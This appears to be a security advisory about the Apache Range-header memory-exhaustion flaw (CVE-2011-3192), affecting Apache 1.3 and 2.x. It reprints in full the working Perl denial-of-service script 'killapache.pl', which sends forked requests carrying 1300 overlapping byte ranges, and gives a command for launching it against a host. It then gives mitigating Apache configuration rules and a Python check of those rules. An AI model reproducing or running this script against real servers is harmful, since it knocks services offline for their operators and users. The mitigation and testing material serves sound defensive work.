Apache server memory-exhaustion attack code and countermeasures

All Apache 1.3 and 2.x versions are affected by this problem
Versions: Apache 1.3 all versions, Apache 2 all versions

The attacking Perl code is as follows (quotes and escape sequences restored from the mangled listing):

```perl
use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] \n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
# builds ",5-0,5-1,...,5-1299": 1300 overlapping byte ranges in one header,
# which is the pattern the Range-header workarounds below are written to catch
$p = "";
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->waitallchildren;
print ":pPpPpppPpPPppPpppPp\n";
}

# probe: sends a single-range request ($p is still empty here) and treats a
# "206 Partial Content" status line as a sign that the host is vulnerable
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) {
usage;
exit;
}

if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}
```

Save it as killapache.pl.
On Linux, run `perl killapache.pl www.example.com 50`
to launch the attack; the targeted server exhausts all of its memory within a short time and stops responding.
As a temporary measure, the following restrictions can be applied.

Apache 2.0 and 2.2:

```apache
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range
```

Apache 1.3:

```apache
# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]
```
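To check what these two workarounds actually let through, here is an added Python model (not part of the original page or of Apache) that applies the same two regular expressions to a parsed Range: header; the host name and the sample requests are constructed for the test.

```python
import re

# Thresholds from the Apache workarounds quoted above: at most 5 byte ranges.
# Apache 2.x SetEnvIf pattern: five or more commas in Range means bad-range=1.
TOO_MANY_RANGES = re.compile(r"(,.*?){5,}")
# Apache 1.3 RewriteCond pattern: header must be empty or carry 1..5 ranges.
WELL_FORMED = re.compile(r"^bytes=[^,]+(,[^,]+){0,4}$")

def range_header_of(raw_request):
    """Range: header value from a raw HTTP/1.1 request, '' if absent."""
    head = raw_request.partition("\r\n\r\n")[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")  # also handles 'Range:bytes='
        if name.strip().lower() == "range":
            return value.strip()
    return ""

def count_ranges(range_value):
    """Number of comma-separated range specs after 'bytes='."""
    specs = range_value.partition("=")[2]
    return sum(1 for s in specs.split(",") if s.strip())

def apache2_drops_range(range_value):
    """True when the 2.x rule would set bad-range=1 and unset the header."""
    return TOO_MANY_RANGES.search(range_value) is not None

def apache13_rejects(range_value):
    """True when the 1.3 RewriteCond/RewriteRule [F] would answer 403."""
    return range_value != "" and WELL_FORMED.match(range_value) is None

def evaluate(raw_request):
    """(range count, dropped by the 2.x rule, rejected by the 1.3 rule)."""
    rng = range_header_of(raw_request)
    return count_ranges(rng), apache2_drops_range(rng), apache13_rejects(rng)

def many_range_request(host, n):
    """Constructed request with the header shape the script's loop builds."""
    ranges = "0-" + "".join(f",5-{k}" for k in range(n))
    return (f"HEAD / HTTP/1.1\r\nHost: {host}\r\nRange:bytes={ranges}\r\n"
            "Accept-Encoding: gzip\r\nConnection: close\r\n\r\n")

if __name__ == "__main__":
    # constructed samples: a normal two-range resume and the script's 1301-range header
    normal = ("GET /file.iso HTTP/1.1\r\nHost: www.example.com\r\n"
              "Range: bytes=0-99,200-299\r\n\r\n")
    print("normal", evaluate(normal))  # (2, False, False)
    print("many", evaluate(many_range_request("www.example.com", 1300)))  # (1301, True, True)
```

Note that the probe in testapache sends a single range (`Range: bytes=0-`), which both workarounds pass through unchanged, so a 206 Partial Content reply from a server carrying this configuration says nothing about exposure; confirm the workaround with a request of six or more ranges, or by upgrading.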
Better still, upgrade your Apache as soon as possible; the Apache project has released emergency updated versions.

References

http://www.exploit-db.com/exploits/17696/
http://lwn.net/Articles/456268/